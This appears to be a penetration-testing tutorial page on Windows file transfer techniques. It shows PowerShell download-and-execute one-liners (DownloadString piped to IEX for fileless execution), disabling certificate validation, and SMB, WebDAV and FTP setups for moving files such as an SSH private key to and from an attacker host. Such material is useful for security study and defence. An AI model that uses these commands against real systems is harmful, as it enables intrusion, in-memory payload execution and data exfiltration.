Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

Windows File Transfer Methods

Introduction

Windows provides various native utilities for file transfer operations. Understanding these methods is important for both attackers (to operate and evade detection) and defenders (to monitor and create policies).

Fileless attacks use legitimate built-in tools to execute attacks without dropping files to disk. The Microsoft Astaroth APT attack demonstrates this - it used WMIC, Bitsadmin, Certutil, and Regsvr32 to download, decode, and execute payloads in memory.

Download Operations

PowerShell Base64 Encode & Decode

For small files, encode on attacker machine, copy string, and decode on target. Verify integrity with MD5 checksums.

On attacker machine:

md5sum id_rsa
cat id_rsa |base64 -w 0;echo

On Windows target:

[IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("<base64_string>"))
Get-FileHash C:\Users\Public\id_rsa -Algorithm md5

Limitations: Windows cmd.exe has max string length of 8,191 characters. Web shells may error on very large strings.

PowerShell Web Downloads

Most companies allow HTTP/HTTPS outbound traffic. PowerShell’s System.Net.WebClient class provides multiple download methods:

MethodDescription
DownloadFileDownloads to local file
DownloadFileAsyncAsync version of DownloadFile
DownloadStringDownloads as string (for fileless execution)
DownloadDataDownloads as byte array

DownloadFile:

(New-Object Net.WebClient).DownloadFile('<URL>','<Output File>')

DownloadString (Fileless):

IEX (New-Object Net.WebClient).DownloadString('<URL>')
# Or with pipeline:
(New-Object Net.WebClient).DownloadString('<URL>') | IEX

Invoke-WebRequest (PowerShell 3.0+):

Invoke-WebRequest <URL> -OutFile <filename>
# Aliases: iwr, curl, wget

Common Errors & Fixes:

  1. IE first-launch configuration error:
Invoke-WebRequest <URL> -UseBasicParsing | IEX
  1. SSL/TLS certificate trust error:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

SMB Downloads

SMB (TCP/445) is common in enterprise Windows networks. Create SMB server with Impacket:

sudo impacket-smbserver share -smb2support /tmp/smbshare

Download from Windows:

copy \\<IP>\share\<file>

Note: Newer Windows blocks unauthenticated guest access. Use credentials:

sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test

net use n: \\<IP>\share /user:test test
copy n:\<file>

FTP Downloads

FTP uses TCP/21 and TCP/20. Setup Python FTP server:

sudo pip3 install pyftpdlib
sudo python3 -m pyftpdlib --port 21

Download with PowerShell:

(New-Object Net.WebClient).DownloadFile('ftp://<IP>/file.txt', 'C:\Users\Public\ftp-file.txt')

Download with FTP client (non-interactive):

echo open <IP> > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo GET file.txt >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt

Upload Operations

PowerShell Base64 Encode & Decode

Encode on Windows:

[Convert]::ToBase64String((Get-Content -path "<file>" -Encoding byte))
Get-FileHash "<file>" -Algorithm MD5 | select Hash

Decode on attacker machine:

echo "<base64_string>" | base64 -d -w 0 > <output_file>
md5sum <output_file>  # Verify hash matches

SMB Uploads

SMB (TCP/445) is often blocked outbound. Use WebDAV (HTTP/HTTPS extension) as alternative - Windows will try SMB first, then fall back to HTTP.

Setup WebDAV server:

sudo pip3 install wsgidav cheroot
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

Upload from Windows:

copy <file> \\<IP>\DavWWWRoot\
# Or specify folder:
copy <file> \\<IP>\<sharefolder>\

Note: DavWWWRoot is a special keyword - no actual folder exists. Can also use net use to mount if needed.

If SMB allowed, use Impacket:

sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test

FTP Uploads

Setup FTP server with write permissions:

sudo python3 -m pyftpdlib --port 21 --write

Upload with PowerShell:

(New-Object Net.WebClient).UploadFile('ftp://<IP>/filename', '<local_file_path>')

Upload with FTP client (non-interactive):

echo open <IP> > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo PUT <file> >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt

Summary

  • Base64: No network needed, limited by terminal length
  • PowerShell WebClient: HTTP/HTTPS, most common, supports fileless execution
  • SMB: Common in enterprise, often blocked outbound (use WebDAV)
  • FTP: Alternative protocol, requires server setup
  • Fileless attacks: Use DownloadString + IEX to execute in memory without touching disk